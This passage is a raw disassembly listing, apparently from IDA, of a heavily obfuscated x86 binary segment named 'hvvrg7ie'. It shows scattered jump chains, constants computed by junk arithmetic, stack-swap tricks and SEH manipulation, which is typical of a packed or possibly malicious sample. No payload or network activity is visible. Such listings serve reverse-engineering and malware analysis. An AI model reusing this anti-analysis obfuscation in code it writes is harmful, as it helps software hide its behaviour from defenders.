; ---------------------------------------------------------------------------

loc_43B10A:				; CODE XREF: hvvrg7ie:loc_43EF2Fj
		sub	ebp, 7A4D82DFh
		cmp	ebp, 844A2571h
		jmp	loc_44DD2C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45265D

loc_43B11B:				; CODE XREF: sub_45265D-F993j
		and	ebp, 0B25015A8h

loc_43B121:				; CODE XREF: sub_45265D:loc_4505A2j
		push	offset sub_454789
		jmp	nullsub_157
; END OF FUNCTION CHUNK	FOR sub_45265D

; =============== S U B	R O U T	I N E =======================================



sub_43B12B	proc near		; DATA XREF: sub_440AD9+1E7Bo
		add	eax, 3C1E7Fh
		xchg	eax, [esp+0]
		jmp	sub_456DE7
sub_43B12B	endp

; ---------------------------------------------------------------------------
		adc	eax, 0DB2F539Ah
		jmp	sub_4561C8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F6B

loc_43B144:				; CODE XREF: sub_442F6B-6C8Dj
		jl	loc_43FDFC
; END OF FUNCTION CHUNK	FOR sub_442F6B
; START	OF FUNCTION CHUNK FOR sub_44C513

loc_43B14A:				; CODE XREF: hvvrg7ie:0043F88Aj
					; sub_44C513+8j
		jmp	loc_44D52D
; END OF FUNCTION CHUNK	FOR sub_44C513
; ---------------------------------------------------------------------------
		add	esi, 0FD58091Dh
		cdq
		pop	esi
		mov	esi, [ecx]
		jmp	loc_456B99
; ---------------------------------------------------------------------------
		mov	ebp, esp
		push	eax
		push	ebx
		mov	ebx, ecx
		xchg	ebx, [esp]
		jmp	loc_43C9CE
; ---------------------------------------------------------------------------

loc_43B16C:				; CODE XREF: hvvrg7ie:loc_43BF0Fj
		add	eax, 0CE752DDDh
		sub	eax, 0E23B1DD3h
		xor	eax, 3DF097AEh

loc_43B17E:				; CODE XREF: hvvrg7ie:0045319Bj
		and	eax, 0D12A96BCh
		jns	loc_450138
; START	OF FUNCTION CHUNK FOR sub_43CEB6

loc_43B18A:				; CODE XREF: sub_43CEB6+1862Dj
					; hvvrg7ie:loc_4568FEj
		jmp	loc_444AB7
; END OF FUNCTION CHUNK	FOR sub_43CEB6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44059F

loc_43B18F:				; CODE XREF: sub_44059F:loc_4405A5j
		jmp	loc_442DA8
; END OF FUNCTION CHUNK	FOR sub_44059F
; ---------------------------------------------------------------------------
		js	loc_445C93
		jmp	loc_43C867
; ---------------------------------------------------------------------------

loc_43B19F:				; CODE XREF: hvvrg7ie:0043E69Aj
		pop	edx
		or	edx, ds:4000F2h
		push	offset loc_452C31
		jmp	loc_4567E8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_43B1B0:				; CODE XREF: sub_454099-710Aj
		jbe	loc_457DF6
		sbb	eax, ebx
		jmp	sub_44E34F
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_43B1BD:				; CODE XREF: sub_43F227:loc_4525D0j
		jnz	loc_450BAA
		jmp	loc_455F91
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4413A5

loc_43B1C8:				; CODE XREF: sub_4413A5-356Cj
		jle	loc_45449E

loc_43B1CE:				; CODE XREF: sub_4413A5:loc_450836j
		mov	eax, [ebp+var_4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_44A0A6
		jmp	loc_445D5E
; END OF FUNCTION CHUNK	FOR sub_4413A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457F6F

loc_43B1DF:				; CODE XREF: sub_457F6F:loc_447E35j
		jz	loc_456CBE

loc_43B1E5:				; CODE XREF: sub_45B395-12CBFj
		jmp	loc_44E686
; END OF FUNCTION CHUNK	FOR sub_457F6F
; ---------------------------------------------------------------------------

loc_43B1EA:				; CODE XREF: hvvrg7ie:0043A605j
		jmp	sub_44631F
; ---------------------------------------------------------------------------
		push	4281A5F9h
		sbb	ecx, edx
		jmp	loc_456CBE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440AD9

loc_43B1FB:				; CODE XREF: sub_440AD9:loc_443FA7j
		cdq
		jmp	loc_453DAA
; END OF FUNCTION CHUNK	FOR sub_440AD9
; ---------------------------------------------------------------------------
		mov	[ebp-4], eax
		jmp	loc_44E839
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_43B209:				; CODE XREF: sub_4465A6:loc_444DE2j
		push	2F3179FBh
		pop	eax
		rol	eax, 1Dh
		xor	eax, 98453E22h
		add	eax, ebp
		jmp	loc_451598
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------

loc_43B21F:				; CODE XREF: hvvrg7ie:loc_453D65j
		jnz	loc_44890E
		shr	edx, 1Fh
		jbe	loc_43A3B3
		pushf
		jmp	loc_451D36
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_43B234:				; CODE XREF: sub_43D285:loc_444918j
		mov	esp, ebp
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CA70

loc_43B238:				; CODE XREF: sub_43CA70+1BBFAj
		jmp	nullsub_315
; END OF FUNCTION CHUNK	FOR sub_43CA70
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45ADCB

loc_43B23D:				; CODE XREF: sub_45ADCB-6495j
		jmp	nullsub_441
; END OF FUNCTION CHUNK	FOR sub_45ADCB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43B243:				; CODE XREF: hvvrg7ie:00454B38j
		jmp	sub_43C811

; =============== S U B	R O U T	I N E =======================================



sub_43B248	proc near		; CODE XREF: hvvrg7ie:0043B3A2j
					; sub_43BFCF+13E93j ...
		jnz	sub_43F8AB
		jmp	sub_4413A5
sub_43B248	endp

; ---------------------------------------------------------------------------
		xchg	ecx, [edi]
		sbb	ebx, ebp
		jmp	sub_4513A7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44955C

loc_43B25C:				; CODE XREF: sub_44955C+9D2Dj
		jle	sub_45B163
		jle	loc_445002

loc_43B268:				; CODE XREF: sub_43C989:loc_45050Ej
		push	edi
		push	0C4D5A580h
		pop	edi
		or	edi, 4743626Dh
		add	edi, 386C7F0Dh
		xchg	edi, [esp+4+var_4]
		jmp	loc_44E9E2
; END OF FUNCTION CHUNK	FOR sub_44955C
; ---------------------------------------------------------------------------

loc_43B283:				; CODE XREF: hvvrg7ie:00439152j
					; hvvrg7ie:0043916Dj
		xor	edx, 7F83B074h

loc_43B289:				; CODE XREF: hvvrg7ie:00443AF3j
		add	edx, 0EEC6D5A4h
		add	edx, ebp
		add	edx, 99FE708Ah
		call	sub_448FB0
; START	OF FUNCTION CHUNK FOR sub_448828

loc_43B29C:				; CODE XREF: sub_448828+Dj
		jmp	sub_446A16
; END OF FUNCTION CHUNK	FOR sub_448828
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F4D4

loc_43B2A1:				; CODE XREF: hvvrg7ie:00443AFBj
					; sub_44F4D4+Dj
		xor	ecx, 18EFC63Eh
		xchg	ecx, [esp+0]
		push	eax
		call	sub_453405
		push	eax
		push	1A5C1437h
		pop	eax
		sub	eax, 0FEF20FE0h
		jmp	loc_44B1E5
; END OF FUNCTION CHUNK	FOR sub_44F4D4
; ---------------------------------------------------------------------------

loc_43B2C2:				; CODE XREF: hvvrg7ie:004449EDj
		xchg	eax, [ecx]

; =============== S U B	R O U T	I N E =======================================



sub_43B2C4	proc near		; CODE XREF: sub_44955C-7312p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0045577B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A538 SIZE 00000015 BYTES

		xchg	eax, [esp+0]
		pop	eax
		xchg	ecx, [esp-4+arg_0]
		push	esi
		push	0FB0D67FFh
		shr	esi, 0Bh
		jmp	loc_45577B
sub_43B2C4	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452AA0

loc_43B2D9:				; CODE XREF: sub_452AA0+6C6j
		jz	loc_43A8D9
		jmp	loc_45765E
; END OF FUNCTION CHUNK	FOR sub_452AA0
; ---------------------------------------------------------------------------

loc_43B2E4:				; CODE XREF: hvvrg7ie:00456E68j
		popf
		mov	ebp, 90169AFAh
; START	OF FUNCTION CHUNK FOR sub_458095

loc_43B2EA:				; CODE XREF: sub_458095:loc_456E54j
		add	esi, 0C3473F51h
		mov	[esi], eax
		pop	esi
		lea	eax, sub_446B4C
		jmp	loc_444AB2
; END OF FUNCTION CHUNK	FOR sub_458095
; ---------------------------------------------------------------------------
		shl	ecx, 18h
		jmp	loc_43A562
; ---------------------------------------------------------------------------
		mov	ebx, 41267D27h
		jmp	sub_4571A0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444C9C

loc_43B310:				; CODE XREF: sub_444C9C:loc_439C50j
		push	offset loc_43FBB3
		jmp	loc_43D6ED
; END OF FUNCTION CHUNK	FOR sub_444C9C
; ---------------------------------------------------------------------------

loc_43B31A:				; CODE XREF: hvvrg7ie:00451A7Bj
		xor	ebp, 0F42C0931h

loc_43B320:				; CODE XREF: hvvrg7ie:loc_43CFBFj
		call	sub_43FC7F
		shr	ecx, 0Ch
		or	esi, 0D41CDB6Eh
		jmp	sub_456118
; ---------------------------------------------------------------------------
		push	esi
		jmp	sub_440059
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CF7D

loc_43B339:				; CODE XREF: sub_44CF7D:loc_450619j
		shr	edx, 3
		shl	ebp, 0Ch
		ror	edx, 1Ah
		jmp	loc_455948
; END OF FUNCTION CHUNK	FOR sub_44CF7D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447744

loc_43B347:				; CODE XREF: sub_447744:loc_457ABFj
		add	ecx, 7A6CD94Eh
		xchg	ecx, [esp+4+var_4]
		jmp	loc_4420D8
; END OF FUNCTION CHUNK	FOR sub_447744
; ---------------------------------------------------------------------------

loc_43B355:				; CODE XREF: hvvrg7ie:00441021j
		jle	loc_449965

; =============== S U B	R O U T	I N E =======================================



sub_43B35B	proc near		; CODE XREF: sub_44B69F+1p

; FUNCTION CHUNK AT 0043A96C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F715 SIZE 0000000A BYTES

		xchg	edi, [esp+0]
		pop	edi
		mov	ebp, esp
		js	loc_44F715
		add	esp, 0FFFFFFF8h
		jmp	sub_43C4D7
sub_43B35B	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43B36F	proc near		; DATA XREF: sub_4466A4+6F4o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043A17A SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004413E1 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044C97F SIZE 00000005 BYTES

		push	350B4E91h
		pop	eax
		xor	eax, 0CF1F4E5Fh
		rol	eax, 14h
		add	eax, 5615DA37h
		rol	eax, 0Bh
		add	eax, 9F34F640h
		push	edi
		jmp	loc_4413E1
sub_43B36F	endp

; ---------------------------------------------------------------------------

loc_43B393:				; CODE XREF: hvvrg7ie:loc_4580E4j
		xor	edx, 0CE602BA2h
		add	edx, 3B908B6Fh
		xchg	edx, [esp]
		jmp	sub_43B248
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44980B

loc_43B3A7:				; CODE XREF: sub_446F26+6j
					; sub_44980B+6j
		mov	eax, [ebp-4]
		call	sub_43FE31

loc_43B3AF:				; CODE XREF: hvvrg7ie:00441788j
		jmp	loc_44313F
; END OF FUNCTION CHUNK	FOR sub_44980B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C811

loc_43B3B4:				; CODE XREF: sub_43C811+9j
		jmp	loc_453045
; END OF FUNCTION CHUNK	FOR sub_43C811
; ---------------------------------------------------------------------------

loc_43B3B9:				; CODE XREF: hvvrg7ie:0043BC79j
		jmp	loc_43C271

; =============== S U B	R O U T	I N E =======================================



sub_43B3BE	proc near		; CODE XREF: sub_448FB0-FF45p
					; hvvrg7ie:00457D56j

; FUNCTION CHUNK AT 0043925A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D8DD SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043E435 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043F580 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043F75B SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0043F83E SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043FBFB SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00441A33 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00441EB5 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00442640 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00443C35 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004447F0 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00444BFF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004479F0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447A17 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448038 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004492C7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044932F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C4F0 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044E0D8 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044FA7E SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00450871 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451A3C SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00452217 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459106 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045B7AC SIZE 0000000B BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		inc	dword ptr [ebp-0Ch]
		dec	dword ptr [ebp-18h]
		jnz	loc_4548D4
		jmp	loc_450871
sub_43B3BE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408FA

loc_43B3D3:				; CODE XREF: sub_4408FA:loc_43ADC5j
		call	sub_444E49
		pop	eax
		pop	eax
		push	esi
		jmp	loc_440871
; END OF FUNCTION CHUNK	FOR sub_4408FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C05

loc_43B3E0:				; CODE XREF: sub_440C05:loc_449F29j
		mov	esp, ebp
		pop	ebp
		mov	eax, ds:dword_45A8AC
		or	eax, eax
		jnz	loc_459EB0
		call	sub_44DE0A
		mov	edx, 0B9726E5Ah
		call	sub_446A16
		jmp	loc_44CAE9
; END OF FUNCTION CHUNK	FOR sub_440C05
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_43B405:				; CODE XREF: sub_445CCD-1D99j
		and	edx, 569224F3h
		xor	edx, 8A9840E3h
		add	edx, ebp
		push	eax
		push	6FE2926Bh
		pop	eax
		or	eax, 0CD8D9A8Ah
		jmp	loc_440519
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------
		adc	ecx, 381DCA6Ah
		jmp	sub_446F91
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456944

loc_43B430:				; CODE XREF: sub_456944+18j
		mov	ebx, eax
		xchg	ebx, [esp+8+var_8]
		push	offset loc_439124
		jmp	nullsub_281
; END OF FUNCTION CHUNK	FOR sub_456944
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B1C6

loc_43B43F:				; CODE XREF: sub_44B1C6-39A1j
					; sub_44B1C6:loc_44B985j
		call	sub_439549
		push	offset sub_442334
		jmp	loc_43DCAE
; END OF FUNCTION CHUNK	FOR sub_44B1C6
; ---------------------------------------------------------------------------

loc_43B44E:				; DATA XREF: sub_45A2CE-2369o
		call	sub_4489AE
		mov	eax, 0D4280129h
		push	eax
		push	79A6C54Fh
		pop	eax
		or	eax, 1B39F114h
		jmp	loc_45995F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_305. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B048

loc_43B46B:				; CODE XREF: sub_45B048-6A25j
		jmp	loc_453A40
; END OF FUNCTION CHUNK	FOR sub_45B048
; ---------------------------------------------------------------------------

loc_43B470:				; CODE XREF: hvvrg7ie:004485F8j
		jmp	locret_44A538
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BEBB

loc_43B475:				; CODE XREF: sub_44BEBB:loc_44A789j
		ror	eax, 0Eh
		xor	edi, 0B921F955h
		js	loc_43F06C

loc_43B484:				; CODE XREF: hvvrg7ie:loc_4496F4j
		jmp	loc_4408C5
; END OF FUNCTION CHUNK	FOR sub_44BEBB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_200. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43B48A:				; CODE XREF: hvvrg7ie:00455C99j
		jmp	loc_446EB6
; ---------------------------------------------------------------------------

loc_43B48F:				; CODE XREF: hvvrg7ie:00443D46j
					; hvvrg7ie:00443FF2j
		jmp	loc_44620A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D910

loc_43B494:				; CODE XREF: sub_43D910:loc_457FBDj
		call	sub_43FC15
		push	41FE4859h
		pop	eax
		rol	eax, 3
		add	eax, 0BB4710A1h

loc_43B4A8:				; CODE XREF: hvvrg7ie:00456EC9j
		call	sub_45903D

loc_43B4AD:				; CODE XREF: hvvrg7ie:00455B2Ej
		jmp	loc_446D27
; END OF FUNCTION CHUNK	FOR sub_43D910
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45488E

loc_43B4B2:				; CODE XREF: sub_45488E-84D3j
		jmp	nullsub_224
; END OF FUNCTION CHUNK	FOR sub_45488E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447146

loc_43B4B7:				; CODE XREF: sub_447146:loc_4470F3j
		mov	[ecx+0B8h], eax
		pop	ecx
		xor	eax, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_447146
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A625

loc_43B4C1:				; CODE XREF: sub_43A625+144C1j
		jmp	loc_44B78A
; END OF FUNCTION CHUNK	FOR sub_43A625
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A234

loc_43B4C6:				; CODE XREF: sub_45A234-DA07j
		jmp	loc_4406AE
; END OF FUNCTION CHUNK	FOR sub_45A234
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44191F

loc_43B4CB:				; CODE XREF: hvvrg7ie:loc_43BB92j
					; sub_44191F+14F13j
					; DATA XREF: ...
		pop	large dword ptr	fs:0
		add	esp, 4
		jmp	loc_43FAA9
; END OF FUNCTION CHUNK	FOR sub_44191F
; ---------------------------------------------------------------------------

loc_43B4DA:				; CODE XREF: hvvrg7ie:0043D2A6j
					; hvvrg7ie:loc_442920j
		jge	loc_455898
		jge	loc_43D554
		jmp	sub_4480B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F6DB

loc_43B4EB:				; CODE XREF: sub_43F6DB:loc_449139j
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_43F6DB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454463

loc_43B4ED:				; CODE XREF: sub_454463:loc_452D1Cj
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0
		jnz	loc_456292
		mov	eax, [ebp-8]
		mov	byte ptr [eax],	0
		jmp	loc_44B69A
; END OF FUNCTION CHUNK	FOR sub_454463
; ---------------------------------------------------------------------------
		jmp	nullsub_157
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_43B509:				; CODE XREF: sub_442FD1+1000Dj
		jno	loc_45A883
		push	eax
		push	6B2EBDB9h
		jmp	loc_440B4E
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44958B

loc_43B51A:				; CODE XREF: sub_44958B-183Fj
		or	edi, 4A083C00h
		add	edi, 9593C8B1h
		xchg	edi, [esp+0]
		jmp	sub_44DE0A
; END OF FUNCTION CHUNK	FOR sub_44958B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B6A5

loc_43B52E:				; CODE XREF: sub_43B6A5+Fj
		xchg	esi, [esp+4+var_4]
		mov	eax, esi
		pop	esi
		add	eax, 98482D31h
		rol	eax, 1
		or	eax, 3E071253h
		jmp	loc_4549A6
; END OF FUNCTION CHUNK	FOR sub_43B6A5

; =============== S U B	R O U T	I N E =======================================



sub_43B547	proc near		; DATA XREF: sub_4475EC:loc_4567B5o

; FUNCTION CHUNK AT 004394F6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D1C7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EC24 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00445AAF SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044FFC6 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00450B06 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045882D SIZE 00000005 BYTES

		mov	eax, [esp+0]
		push	edx
		push	esi
		push	0C67E4AB6h
		jmp	loc_4394F6
sub_43B547	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4403B6

loc_43B556:				; CODE XREF: sub_44FFD8:loc_43BDEBj
					; sub_448663-2ED3j ...
		jno	loc_4489C7
		push	edi
		push	0A537E8B3h
		pop	edi
		jmp	loc_43B876
; END OF FUNCTION CHUNK	FOR sub_4403B6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E60A

loc_43B568:				; CODE XREF: sub_43E60A:loc_44985Bj
		test	edx, edi
		jmp	loc_445638
; END OF FUNCTION CHUNK	FOR sub_43E60A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_43B56F:				; CODE XREF: sub_445CCD+55A5j
		push	25C12DDFh

loc_43B574:				; CODE XREF: sub_44398A+EAA0j
		pop	eax
		rol	eax, 0Ah
		cmp	eax, 17DDEA44h
		jmp	loc_443297
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445934

loc_43B583:				; CODE XREF: sub_445934-A35Dj
		sbb	ebx, 60950B19h
		cmp	ecx, 741DB31h
		jmp	loc_44F6EF
; END OF FUNCTION CHUNK	FOR sub_445934

; =============== S U B	R O U T	I N E =======================================



sub_43B594	proc near		; CODE XREF: sub_447EBCp
					; sub_455751:loc_44AE5Cj ...
		call	sub_458175

loc_43B599:				; CODE XREF: sub_4406E9+198DDj
		jmp	sub_450C5A
sub_43B594	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456881

loc_43B59E:				; CODE XREF: sub_456881-1AF02j
		cmp	esi, ebp
		jmp	loc_448D91
; END OF FUNCTION CHUNK	FOR sub_456881
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4522F8

loc_43B5A5:				; CODE XREF: sub_4522F8:loc_450DA8j
		pop	edx
		or	edx, 0AA36C23Ch
		jnz	loc_43D18A
; END OF FUNCTION CHUNK	FOR sub_4522F8
; START	OF FUNCTION CHUNK FOR sub_43EB47

loc_43B5B2:				; CODE XREF: sub_43EB47+B47j
		jmp	loc_44AA33
; END OF FUNCTION CHUNK	FOR sub_43EB47
; ---------------------------------------------------------------------------
		not	esi
		jmp	loc_43D188
; ---------------------------------------------------------------------------
		test	al, al
		jz	loc_452E21
		jmp	loc_45501D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445934

loc_43B5CB:				; CODE XREF: sub_445934:loc_445560j
		jz	loc_44F700
		jg	loc_45786D
		jmp	loc_43B583
; END OF FUNCTION CHUNK	FOR sub_445934
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_150. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43B5DD:				; CODE XREF: hvvrg7ie:00441EB0j
		jmp	loc_44C638

; =============== S U B	R O U T	I N E =======================================



sub_43B5E2	proc near		; CODE XREF: sub_448DE4+5p
					; hvvrg7ie:0045B829j

; FUNCTION CHUNK AT 00439507 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00448ABA SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004570C9 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		pushf
		push	5F31D1FBh
		jmp	loc_448ABA
sub_43B5E2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C1F3

loc_43B5F1:				; CODE XREF: sub_44C1F3-E0FEj
					; hvvrg7ie:0045B3D0j
		jge	loc_4524E9
; END OF FUNCTION CHUNK	FOR sub_44C1F3
; START	OF FUNCTION CHUNK FOR sub_456A52

loc_43B5F7:				; CODE XREF: sub_456A52:loc_44B0CCj
		jmp	loc_446199
; END OF FUNCTION CHUNK	FOR sub_456A52
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_43B5FC:				; CODE XREF: sub_450434-5D84j
		jmp	loc_43E3A5
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------
		mov	ebx, [edx]
		jmp	loc_448788
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E60A

loc_43B608:				; CODE XREF: sub_43E60A+2F53j
		not	edi
		jmp	loc_44906F
; END OF FUNCTION CHUNK	FOR sub_43E60A
; ---------------------------------------------------------------------------

loc_43B60F:				; CODE XREF: hvvrg7ie:loc_43AA48j
		jo	loc_44541A
		mov	eax, [esp]
		push	ecx
		mov	ecx, edx
		xchg	ecx, [esp]
		push	ecx
		jmp	loc_44D599

; =============== S U B	R O U T	I N E =======================================



sub_43B624	proc near		; CODE XREF: sub_451C5Ej
					; DATA XREF: sub_458175-6521o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044BE35 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BE68 SIZE 0000002B BYTES
; FUNCTION CHUNK AT 0044C5B1 SIZE 0000001F BYTES

		push	edi
		push	edx
		pop	edi
		xchg	edi, [esp+4+var_4]
		call	sub_43C836
		push	486CEDB0h
		pop	eax
		jmp	loc_44BE68
sub_43B624	endp

; ---------------------------------------------------------------------------

loc_43B63A:				; CODE XREF: hvvrg7ie:0044617Cj
		sbb	esi, ebp

; =============== S U B	R O U T	I N E =======================================



sub_43B63C	proc near		; CODE XREF: sub_439E6C+6C0Dp

; FUNCTION CHUNK AT 0044401B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D789 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004502AA SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00452007 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	eax
		mov	eax, edx
		jmp	loc_452007
sub_43B63C	endp


; =============== S U B	R O U T	I N E =======================================



sub_43B648	proc near		; CODE XREF: sub_43953B+A65Ep
					; hvvrg7ie:00454A34j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043DF60 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		add	ebx, 0CC3FEAC8h

loc_43B652:				; CODE XREF: hvvrg7ie:loc_43DAD3j
		xchg	ebx, [esp-4+arg_0]
		jmp	loc_43DF60
sub_43B648	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43B65A:				; CODE XREF: hvvrg7ie:00448A2Cj
					; hvvrg7ie:0045078Aj
		mov	eax, [ebp+8]
		cmp	dword ptr [eax-1Ch], 0F6h
		setz	al

loc_43B667:				; CODE XREF: hvvrg7ie:00450774j
		call	sub_447079
		pop	ecx
		jmp	loc_43F541
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4554E8

loc_43B672:				; CODE XREF: sub_4554E8-2AD3j
		xor	eax, ecx
		adc	ecx, 2BA353D8h
		adc	ebp, edx

loc_43B67C:				; CODE XREF: sub_4554E8:loc_454C63j
		push	11F8CA9h
		jmp	loc_443636
; END OF FUNCTION CHUNK	FOR sub_4554E8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455087

loc_43B686:				; CODE XREF: sub_455087+1390j
		js	loc_44D15E
		or	edi, ebp
		pushf

loc_43B68F:				; CODE XREF: sub_455087:loc_448021j
		push	offset loc_448341
		jmp	nullsub_359
; END OF FUNCTION CHUNK	FOR sub_455087
; ---------------------------------------------------------------------------
		add	edi, 0F2FD93EBh
		cdq
		jmp	sub_43AC3B

; =============== S U B	R O U T	I N E =======================================



sub_43B6A5	proc near		; CODE XREF: hvvrg7ie:00453077j
					; sub_451E1C+3A4Ap

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00439647 SIZE 00000015 BYTES
